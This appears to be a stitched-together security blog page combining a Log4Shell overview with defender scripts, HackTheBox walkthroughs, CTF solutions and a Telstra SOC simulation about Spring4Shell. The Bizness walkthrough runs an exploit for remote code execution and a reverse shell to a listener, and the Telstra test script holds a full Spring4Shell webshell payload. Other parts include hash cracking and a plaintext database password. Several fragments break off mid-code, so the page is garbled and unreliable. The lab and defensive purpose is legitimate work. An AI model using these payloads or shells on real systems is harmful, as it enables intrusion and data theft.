    December 22, 2021 : U.S. CISA, FBI, NSA, and Five Eyes Alliance issued a joint security alert
    December 23, 2021 : Belgium Ministry of Defense confirmed Log4j attack
    December 2021 : Apache released 4 patches to fully fix the Log4j vulnerability
Mitigations
The Log4j vulnerability, also known as **Log4Shell (CVE-2021-44228)**, is a critical remote code execution (RCE) vulnerability affecting Apache Log4j 2. It allows an attacker to make the server download and execute malicious code by feeding a malicious JNDI (Java Naming and Directory Interface) lookup string into input that gets logged.
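Two checks a defender can run with the information above, as an added example that is not part of the original post: a version triage that applies the ranges quoted from the CVE text (2.0-beta9 through 2.15.0 affected, 2.12.2/2.12.3/2.3.1 backported, lookups disabled by default from 2.15.0, JNDI lookup removed from 2.16.0), and a scan of access-log lines for lookup strings. The log lines are constructed samples using TEST-NET addresses, not real traffic.

```python
"""Added example (not from the original post): two defender-side checks for
Log4Shell. The version ranges come from the CVE text quoted above; the
access-log lines are constructed samples, not real traffic."""
import re

# Security backports that the CVE text lists as not affected.
SAFE_BACKPORTS = {(2, 12, 2), (2, 12, 3), (2, 3, 1)}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1, (1,)); '2.0-beta9' -> (2, 0, 0, (0, 'beta', 9)).
    A pre-release tuple starts with 0 so it sorts before the final release."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor, patch = int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    pre = (0, m.group(4), int(m.group(5))) if m.group(4) else (1,)
    return (major, minor, patch, pre)


def log4j_status(version):
    """Classify a Log4j 2 version against CVE-2021-44228 as described above."""
    v = parse_version(version)
    if v[:3] in SAFE_BACKPORTS:
        return "fixed: security backport"
    if v < parse_version("2.0-beta9"):
        return "not in the affected range"
    if v < parse_version("2.15.0"):
        return "vulnerable: message lookups enabled by default"
    if v < parse_version("2.16.0"):
        return "in range: lookups disabled by default, JNDI code still present"
    return "fixed: JNDI lookup removed"


# A JNDI lookup such as ${jndi:ldap://...}; case-insensitive, tolerant of spaces.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# A lookup nested inside another lookup is normal in log4j configuration files,
# but inside client-supplied fields (URL, User-Agent) it is worth a look.
NESTED_LOOKUP = re.compile(r"\$\{[^}]*\$\{")


def flag_log_line(line):
    """Return a reason if the line carries a lookup pattern, else None."""
    if JNDI_LOOKUP.search(line):
        return "jndi lookup"
    if NESTED_LOOKUP.search(line):
        return "nested lookup"
    return None


def scan_access_log(lines):
    """Return [(line_number, reason)] for the lines worth investigating."""
    hits = []
    for number, line in enumerate(lines, 1):
        reason = flag_log_line(line)
        if reason:
            hits.append((number, reason))
    return hits


# Constructed sample access-log lines (TEST-NET addresses, not real traffic).
SAMPLE_ACCESS_LOG = [
    '192.0.2.10 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '192.0.2.11 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '192.0.2.12 - - "GET /?q=${sys:${x}} HTTP/1.1" 200 "-"',
    '192.0.2.13 - - "POST /api HTTP/1.1" 200 "curl/7.88"',
]

if __name__ == "__main__":
    for ver in ("2.14.1", "2.12.2", "2.15.0", "2.17.1"):
        print(ver, "->", log4j_status(ver))
    print(scan_access_log(SAMPLE_ACCESS_LOG))
```

The version check treats 2.15.0 as still inside the CVE range, matching the text: lookups are off by default there, but the JNDI code is present, so the upgrade target is 2.16.0 or one of the backports. The log scan is a triage aid, not a WAF: it runs over whatever the web tier logged, which is exactly the data Log4j would have interpreted.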
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST
Nmap scan report for bizness.htb (10.129.232.1)
Host is up (0.040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
41845/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds

echo "10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# update-alternatives --config java
There are 3 choices for the alternative java (providing /usr/bin/java).

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# java --version
openjdk 11.0.20-ea 2023-07-18
OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
Start tcpdump:

sudo tcpdump -i 2 icmp

Run the PoC:

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8"
Not Sure Worked or not

Check the captured packets:

┌──(root@kali)-[/home/h4m5t/Desktop]
└─# tcpdump -i 2 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
21:47:38.693694 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64
21:47:38.693728 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64
21:47:39.695235 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64
21:47:39.695274 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64

This shows the RCE worked; now get a reverse shell.

First start an nc listener, then run the exploit:

nc -nlvp 4444

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444
Not Sure Worked or not
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash
# -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() --
password.encrypt.hash.type=SHA

cat HashCrypt.java
/*******************************************************************************
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 *******************************************************************************/
package org.apache.ofbiz.base.crypto;

    private static boolean doCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) {
        int typeEnd = crypted.indexOf("}");
        String hashType = crypted.substring(1, typeEnd);
        String hashed = crypted.substring(typeEnd + 1);
        MessageDigest messagedigest = getMessageDigest(hashType);
        messagedigest.update(bytes);
        byte[] digestBytes = messagedigest.digest();
        char[] digestChars = Hex.encodeHex(digestBytes);
        String checkCrypted = new String(digestChars);
        if (hashed.equals(checkCrypted)) {
            return true;
        }
        // This next block should be removed when all {prefix}oldFunnyHex are fixed.
        if (hashed.equals(oldFunnyHex(digestBytes))) {
            Debug.logWarning("Warning: detected oldFunnyHex password prefixed with a hashType; this is not valid, please update the value in the database with ({%s}%s)", module, hashType, checkCrypted);
            return true;
        }
        return false;
    }

    /*
     * @deprecated use cryptBytes(hashType, salt, password); eventually, use
     * cryptUTF8(hashType, salt, password) after all existing installs are
     * salt-based.  If the call-site of cryptPassword is just used to create a *new*
     * value, then you can switch to cryptUTF8 directly.
     */
    @Deprecated
    public static String cryptPassword(String hashType, String salt, String password) {
        if (hashType.startsWith("PBKDF2")) {
            return password != null ? pbkdf2HashCrypt(hashType, salt, password) : null;
        }
        return password != null ? cryptBytes(hashType, salt, password.getBytes(UtilIO.getUtf8())) : null;
    }

            messagedigest.update(strBytes);
            return oldFunnyHex(messagedigest.digest());
        } catch (Exception e) {
            Debug.logError(e, "Error while computing hash of type " + hashType, module);
        }
        return str;
    }

    // This next block should be removed when all {prefix}oldFunnyHex are fixed.
    private static String oldFunnyHex(byte[] bytes) {
        int k = 0;
        char[] digestChars = new char[bytes.length * 2];
        for (byte b : bytes) {
            int i1 = b;

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Minimim salt length supported by kernel: 0
Maximum salt length supported by kernel: 256

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
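What `password.encrypt.hash.type=SHA` and `doCompareTypePrefix` amount to, as an added example that is not OFBiz code: the stored value is `{SHA}` followed by an unsalted SHA-1 of the password, so any leaked hash can be attacked with a plain wordlist (the hashcat run above) and two users with the same password get the same hash. The Python below mirrors that comparison and puts a salted PBKDF2 check beside it. The `$PBKDF2-SHA256$iterations$salt$dk` layout and the 600,000 iteration count are this example's own assumptions, not OFBiz's format.

```python
"""Added example (not OFBiz code): OFBiz-style '{SHA}<hex>' comparison next to
a salted PBKDF2 verifier. The PBKDF2 string layout and iteration count are
assumptions for illustration, not OFBiz's own format."""
import hashlib
import hmac
import os

# java.security.MessageDigest names that may appear in security.properties -> hashlib names.
JAVA_DIGESTS = {"SHA": "sha1", "SHA-1": "sha1", "SHA-256": "sha256", "MD5": "md5"}


def make_prefixed_hash(hash_type, password):
    """What password.encrypt.hash.type=SHA stores: an unsalted digest behind a '{type}' tag."""
    digest = hashlib.new(JAVA_DIGESTS[hash_type], password.encode("utf-8")).hexdigest()
    return "{" + hash_type + "}" + digest


def compare_type_prefix(crypted, password):
    """Mirror of doCompareTypePrefix: split '{type}hex', recompute and compare.

    The Java code uses String.equals; compare_digest is used here so the
    comparison time does not depend on how many leading characters match."""
    type_end = crypted.index("}")
    hash_type = crypted[1:type_end]
    hashed = crypted[type_end + 1:]
    digest = hashlib.new(JAVA_DIGESTS[hash_type], password.encode("utf-8")).hexdigest()
    return hmac.compare_digest(hashed, digest)


PBKDF2_ITERATIONS = 600_000  # assumed; OWASP's 2023 guidance for PBKDF2-HMAC-SHA256


def make_pbkdf2_hash(password, salt=None, iterations=PBKDF2_ITERATIONS):
    """Salted, iterated hash. The '$PBKDF2-SHA256$iter$salt$dk' layout is this example's own."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"$PBKDF2-SHA256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(stored, password):
    """Parse the stored string, recompute with its own salt and iteration count, compare."""
    _, algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "PBKDF2-SHA256":
        raise ValueError(f"unsupported scheme {algo!r}")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def identical_for_same_password(make, password):
    """True when two accounts with the same password store the same value,
    which is what lets one cracked hash unlock every account sharing it."""
    return make(password) == make(password)


if __name__ == "__main__":
    print(make_prefixed_hash("SHA", "password"))
    print(identical_for_same_password(lambda p: make_prefixed_hash("SHA", p), "password"))
    print(identical_for_same_password(make_pbkdf2_hash, "password"))
```

The point for an operator is the configuration line, not the Java: changing `password.encrypt.hash.type` from `SHA` to a `PBKDF2` type is what moves an install onto the salted branch of `cryptPassword` above.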
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There’s an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There’s also an arbitrary file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST
Nmap scan report for 10.129.96.12
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Mixt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 217
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for manager@localhost                                                                                  |
+---------------------------------------------------------------------------------------------------------------+
| GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' |
| GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost`                                            |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Invalidated]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 23:26 AEST
Nmap scan report for invalidated.htb (10.129.233.58)
Host is up (0.015s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Sign up
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds

Hello dear user, I am Larry Page and I am delighted to announce to you that=
 you are the 99999999th GMAIL account and for that we want to reward you. =
You've earned $1,000,000. To claim your prize open the attached file.
----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<p>Hello dear user, I am Larry Page and I am delighted to announce to you =
that you are the 99999999th GMAIL account and for that we want to reward =
you. You've earned $1,000,000. To claim your prize open the attached file.=
<br></p>
----_NmP-426c22a2e0d8fc9a-Part_2--
#!/bin/bash
# Starting archive. The original excerpt does not show where filename was set;
# taking it from the first argument is an assumption.
filename="$1"

# Extract nested ZIP files in a loop
while [ -f "$filename" ]; do
    # Extract everything in the current ZIP file
    unzip -o "$filename"
    # Remove the archive just extracted; otherwise find returns the same file
    # again and the loop never advances
    rm -f -- "$filename"
    # Find the next ZIP file
    next_zip=$(find . -name "*.zip" | head -n 1)
    # If a new ZIP file was found, update filename; otherwise leave the loop
    if [ -n "$next_zip" ]; then
        filename="$next_zip"
    else
        echo "Extraction complete or no more ZIP files found."
        break
    fi
done
~/Desktop/testtest/ hexdump -C message.txt
00000000  ff fe 68 00 fe ff 00 65  ff fe 32 00 fe ff 00 30  |..h....e..2....0|
00000010  ff fe 32 00 fe ff 00 33  ff fe 7b 00 fe ff 00 75  |..2....3..{....u|
00000020  ff fe 37 00 fe ff 01 92  ff fe 5f 00 fe ff 00 62  |..7......._....b|
00000030  ff fe 30 00 fe ff 00 6d  ff fe 35 00 fe ff 00 73  |..0....m..5....s|
00000040  ff fe 5f 00 fe ff 00 38  ff fe 72 00 fe ff 15 f1  |.._....8..r.....|
00000050  ff fe 5f 00 fe ff 00 6e  ff fe 30 00 fe ff 00 37  |.._....n..0....7|
00000060  ff fe 5f 00 fe ff 00 38  ff fe 63 31 fe ff 00 77  |.._....8..c1...w|
00000070  ff fe 61 00 fe ff 00 79  ff fe 35 00 fe ff 00 5f  |..a....y..5...._|
00000080  ff fe 31 00 fe ff 00 67  ff fe 6e 00 fe ff 00 30  |..1....g..n....0|
00000090  ff fe 72 00 fe ff 15 f1  ff fe 64 00 fe ff 00 7d  |..r.......d....}|
000000a0

Extracted flag:

he2023{u7_b0m5s_8r_n07_8c1way5_1gn0rd}
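The hexdump shows a file in which every UTF-16 code unit is preceded by its own byte-order mark, alternating `ff fe` (little-endian) and `fe ff` (big-endian). A plain `.decode("utf-16")` honours only the leading BOM and misreads everything after the first switch, which is the trick such files play on tools that strip or ignore BOMs. The decoder below, an added example that is not part of the original write-up, re-selects the byte order at every BOM; `MESSAGE` is transcribed from the hexdump above.

```python
"""Added example (not from the original write-up): decode a stream in which
every UTF-16 code unit carries its own byte-order mark, as in message.txt
above. MESSAGE is transcribed from that hexdump."""

BOM_LE = b"\xff\xfe"
BOM_BE = b"\xfe\xff"

# The 160 bytes of message.txt, row by row from the hexdump.
MESSAGE = bytes.fromhex(
    "fffe6800feff0065fffe3200feff0030"
    "fffe3200feff0033fffe7b00feff0075"
    "fffe3700feff0192fffe5f00feff0062"
    "fffe3000feff006dfffe3500feff0073"
    "fffe5f00feff0038fffe7200feff15f1"
    "fffe5f00feff006efffe3000feff0037"
    "fffe5f00feff0038fffe6331feff0077"
    "fffe6100feff0079fffe3500feff005f"
    "fffe3100feff0067fffe6e00feff0030"
    "fffe7200feff15f1fffe6400feff007d"
)


def split_units(data, default_order="little"):
    """Walk the stream two bytes at a time. A BOM is never emitted as a
    character; it switches the byte order for everything that follows."""
    order = default_order  # assumed only if the stream has no leading BOM
    units = []
    for i in range(0, len(data) - len(data) % 2, 2):
        pair = data[i:i + 2]
        if pair == BOM_LE:
            order = "little"
        elif pair == BOM_BE:
            order = "big"
        else:
            units.append(int.from_bytes(pair, order))
    return units


def decode_bom_switching_utf16(data):
    """Decode honouring every BOM. Re-encoding the code units as UTF-16LE and
    decoding once lets the codec join surrogate pairs and reject lone ones."""
    units = split_units(data)
    return b"".join(u.to_bytes(2, "little") for u in units).decode("utf-16-le")


def naive_decode(data):
    """What a standard decoder does: one BOM at the start, then a fixed byte order."""
    return data.decode("utf-16", errors="replace")


def count_boms(data):
    """Number of BOMs in an aligned stream; here one per character."""
    return sum(1 for i in range(0, len(data) - 1, 2) if data[i:i + 2] in (BOM_LE, BOM_BE))


if __name__ == "__main__":
    print(repr(naive_decode(MESSAGE)))
    print(decode_bom_switching_utf16(MESSAGE))
```

Three of the 40 code units are non-ASCII (U+0192, U+15F1 twice, U+3163), which is why the text the author wrote down and the text the bytes encode differ around those positions; a content filter that only sees the ASCII bytes sees neither the BOMs nor those characters.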
Rotational
Challenge:

96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN

The task is to decrypt this text (the flag). Initial attempts with common simple rotation ciphers such as ROT13 were unsuccessful; the hint "the rotor must have been too fast!" suggests that a more complex rotation algorithm may have been used.
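The general form of the ROT13 attempt above, as an added example that is not part of the original write-up: rotate over the whole printable-ASCII alphabet (ROT13 and ROT47 are two members of that family) for every possible shift, and keep the candidates that start with the `he2023{` prefix the other flag on this page uses. The ciphertext is the challenge string; the prefix heuristic is my assumption.

```python
"""Added example (not from the original write-up): every rotation of the
printable-ASCII alphabet applied to the challenge text, with candidates
filtered by a flag prefix. The prefix is an assumption borrowed from the
other flag on this page."""
import codecs

CIPHERTEXT = "96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN"
FLAG_PREFIX = "he2023{"

# '!' (0x21) .. '~' (0x7e): the 94 printable characters, space excluded.
ALPHABET = "".join(chr(c) for c in range(0x21, 0x7F))


def rotate(text, shift, alphabet=ALPHABET):
    """Shift each alphabet character by `shift` places with wrap-around;
    characters outside the alphabet (e.g. space) pass through unchanged."""
    n = len(alphabet)
    table = {ch: alphabet[(i + shift) % n] for i, ch in enumerate(alphabet)}
    return "".join(table.get(ch, ch) for ch in text)


def rot13(text):
    """The letters-only rotation the write-up tried first (digits and symbols untouched)."""
    return codecs.decode(text, "rot_13")


def all_rotations(text, alphabet=ALPHABET):
    """Every non-trivial shift: a brute force over the whole family."""
    return [(s, rotate(text, s, alphabet)) for s in range(1, len(alphabet))]


def candidates_with_prefix(text, prefix=FLAG_PREFIX):
    """Each shift maps the first ciphertext character somewhere different, so a
    non-empty prefix leaves at most one candidate standing."""
    return [(s, p) for s, p in all_rotations(text) if p.startswith(prefix)]


if __name__ == "__main__":
    print("ROT13:", rot13(CIPHERTEXT))
    for shift, plain in candidates_with_prefix(CIPHERTEXT):
        print(f"shift {shift}: {plain}")
```

The prefix match falls at shift 47, i.e. ROT47, which is its own inverse because 47 is half of 94. ROT13 leaves the digits and punctuation of this ciphertext untouched, which is why it could not produce anything readable here.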
Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
The Telstra Cybersecurity Job Simulation Project is a training program designed to replicate real-world cybersecurity challenges. Participants work through tasks such as detecting threats, responding to incidents, collaborating with different teams, and implementing technical solutions to protect digital systems. This simulation helps individuals build the skills needed to defend against cyber attacks and keep Telstra’s services secure.
In the dynamic realm of cybersecurity, organizations must remain vigilant and responsive to emerging threats to safeguard their infrastructure and services. This blog post presents a detailed case study of how Telstra’s Security Operations Centre (SOC) effectively responded to a Spring4Shell (CVE-2022-22965) malware attack targeting the NBN Connection service. We will walk through the entire incident response process, encompassing initial threat triage, inter-team communication, technical mitigation using Python-based firewall rules, troubleshooting, and a post-incident analysis.
Task 1: Initial Threat Triage and Notification
Incident Identification and Severity Assessment
On March 20th, 2024, at 14:20 UTC, the SOC detected unusual activity targeting the NBN Connection service (nbn.external.network), which operates on Spring Framework 5.3.0. The attack manifested through multiple malicious POST requests to the /tomcatwar.jsp endpoint, indicating an exploitation attempt of the Spring4Shell vulnerability.
Affected Infrastructure and Prioritization
An analysis of firewall logs revealed that the NBN Connection service was under direct attack. Given its critical role in providing high-speed internet connectivity, the incident was classified as P1 - Critical. Other services, including Mobile Tower Connection, Home & Business Lines, and ADSL Connect, were evaluated and found to be unaffected based on the current logs. Nonetheless, continuous monitoring was recommended to ensure comprehensive security.
Notification of the Respective Team
Prompt communication was essential to coordinate an effective response. An urgent email was drafted and sent to the NBN Team, alerting them of the ongoing attack and the necessity to initiate immediate incident response measures.
Email to NBN Team:

From: Telstra Security Operations
To: NBN Team (nbn@email)
Subject: Urgent: Malware Attack Impacting NBN Connection Service
---
Body:

Hello NBN Team,

At **14:20 on March 20, 2024**, a malware attack targeting the **NBN Connection service** running on the **Spring Framework** was detected, resulting in service disruption and impaired functionality. This incident has been assessed as **P1 - Critical** and requires the immediate initiation of incident response measures to restore services and prevent further impact.

Please review the relevant logs promptly and take the necessary mitigation actions. If you need assistance or have any questions, feel free to contact us.

Kind regards,
Telstra Security Operations

This communication ensured that the NBN Team was promptly informed, enabling them to take swift action to mitigate the threat.
Task 2: Collaborating with the Networks Team to Mitigate the Attack
Analyzing Firewall Logs and Identifying Attack Patterns
Upon identifying the attack, the SOC conducted a thorough analysis of the firewall logs. The logs indicated that the attack originated from multiple IP addresses within the AU region, utilizing specific malicious payloads designed to exploit the Spring4Shell vulnerability. The attack pattern involved POST requests to the /tomcatwar.jsp endpoint with parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others.
Drafting an Email to the Networks Team
To address the distributed nature of the attack without blocking individual IP addresses, the SOC collaborated with the Networks Team to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics.
From: Telstra Security Operations
To: Networks Team (networks@email)
Subject: Create Firewall Rule to Mitigate Spring4Shell Attack
---
Body:

Hello Networks Team,

We would like to request the creation of a firewall rule and provide you with more information about the ongoing attack.

**Type of Attack:** Our analysis of the firewall logs indicates a Spring4Shell (CVE-2022-22965) malware attack targeting the **NBN Connection service (nbn.external.network)**. The attack involves multiple POST requests to `/tomcatwar.jsp` with malicious payloads designed to exploit the Spring Framework vulnerability.

**Characteristics to Block:**
- **Request Path:** `/tomcatwar.jsp`
- **HTTP Method:** `POST`
- **Specific Payload Patterns:** Requests containing parameters such as `class.module.classLoader.resources.context.parent.pipeline.first.pattern` and related malicious payloads.

**Request:** Please implement a firewall rule to block incoming POST requests to the `/tomcatwar.jsp` endpoint and inspect for the presence of the aforementioned malicious payload patterns in the request data. This should help mitigate the distributed nature of the attack by targeting the specific exploit characteristics rather than individual IP addresses.

**Additional Information:** The attack has been distributed across multiple IP addresses within the AU region. Blocking the specific request patterns will provide a more effective mitigation strategy. Attached is a proof of concept payload that demonstrates how the attacker scripts this attack, which may aid in refining the firewall rules.

For any questions or issues, don’t hesitate to reach out to us.

Kind regards,
Telstra Security Operations

This email provided the Networks Team with the necessary details to develop targeted firewall rules, enhancing the organization’s defensive measures against the attack.
Task 3: Implementing Firewall Rules with Python
Developing a Python-Based Firewall Rule
To mitigate the attack effectively, a Python script was developed to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics. The goal was to block malicious POST requests to the /tomcatwar.jsp endpoint without relying on IP-based blocking, which is less effective against distributed attacks.
    def do_POST(self):
        # Check if the request path is the targeted endpoint
        if self.path == '/tomcatwar.jsp':
            # Retrieve and decode the request body
            content_length = int(self.headers.get('Content-Length', 0))
            body = self.rfile.read(content_length).decode('utf-8')
            params = urllib.parse.parse_qs(body)
            # Check for the presence of any malicious parameters
            if any(param in params for param in MALICIOUS_PARAMS):
                block_request(self)
                return
            else:
                allow_request(self)
                return
        else:
            # For all other POST requests, allow them
            allow_request(self)

    def log_message(self, format, *args):
        # Override to suppress default logging
        return

if __name__ == "__main__":
    server = HTTPServer((host, port), ServerHandler)
    print("[+] Firewall Server")
    print("[+] HTTP Web Server running on: %s:%s" % (host, port))

    server.server_close()
    print("[+] Server terminated. Exiting...")
    exit(0)

Testing the Firewall Rule
A complementary script, test_requests.py, was utilized to simulate both malicious and benign requests to ensure the firewall rule functioned as intended.

# Test Requester.py
# www.theforage.com - Telstra Cyber Task 3
# Test Requester

import http.client

host = "localhost"
port = 8000

def main():
    target = f"{host}:{port}"
    print(f"[+] Beginning test requests to: {target}")
    successful_responses = 0

    for x in range(5):
        payload = (
            "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if("
            "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di."
            "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20"
            "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%"
            "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module."
            "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader."
            "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent."
            "pipeline.first.fileDateFormat="
        )
        print(f"[{x + 1}/5]: Making test request to {target} with payload: {payload}")
        conn = http.client.HTTPConnection(target)

    print("[+] Test completed.")
    print(f"[+] Successful responses: {successful_responses}/5")

if __name__ == "__main__":
    main()
Troubleshooting: Addressing Port Conflicts
During the deployment of the firewall_server.py script, an error was encountered:

OSError: [Errno 48] Address already in use

This indicated that port 8000 was occupied by another process, preventing the firewall server from binding to it. The following steps were undertaken to resolve the issue:

Identifying the Occupying Process:
Using the lsof command:

lsof -i :8000

This command revealed the Process ID (PID) of the application using port 8000.

Terminating the Conflicting Process:
The identified process was terminated using the kill command:

kill -9 <PID>

Replace <PID> with the actual Process ID obtained from the previous step.

Verifying Port Availability:
Ensuring that port 8000 was free by rerunning the lsof command:

lsof -i :8000

No output indicates that the port is now free.

Restarting the Firewall Server:
After freeing up the port, the firewall_server.py script was successfully executed:

python3 firewall_server.py

The server started without issues, indicating that it was listening on the designated port.

Alternative Solution: Changing the Server Port
If port 8000 remains consistently in use, an alternative approach involves changing the server to listen on a different port (e.g., 8080). This requires updating both the firewall_server.py and test_requests.py scripts to reflect the new port number.

Edit firewall_server.py:
Modify the port variable:

host = "localhost"
port = 8080

Edit test_requests.py:
Update the port number accordingly:

host = "localhost"
port = 8080

Run the Modified Server:

python3 firewall_server.py

Run the Test Requester:

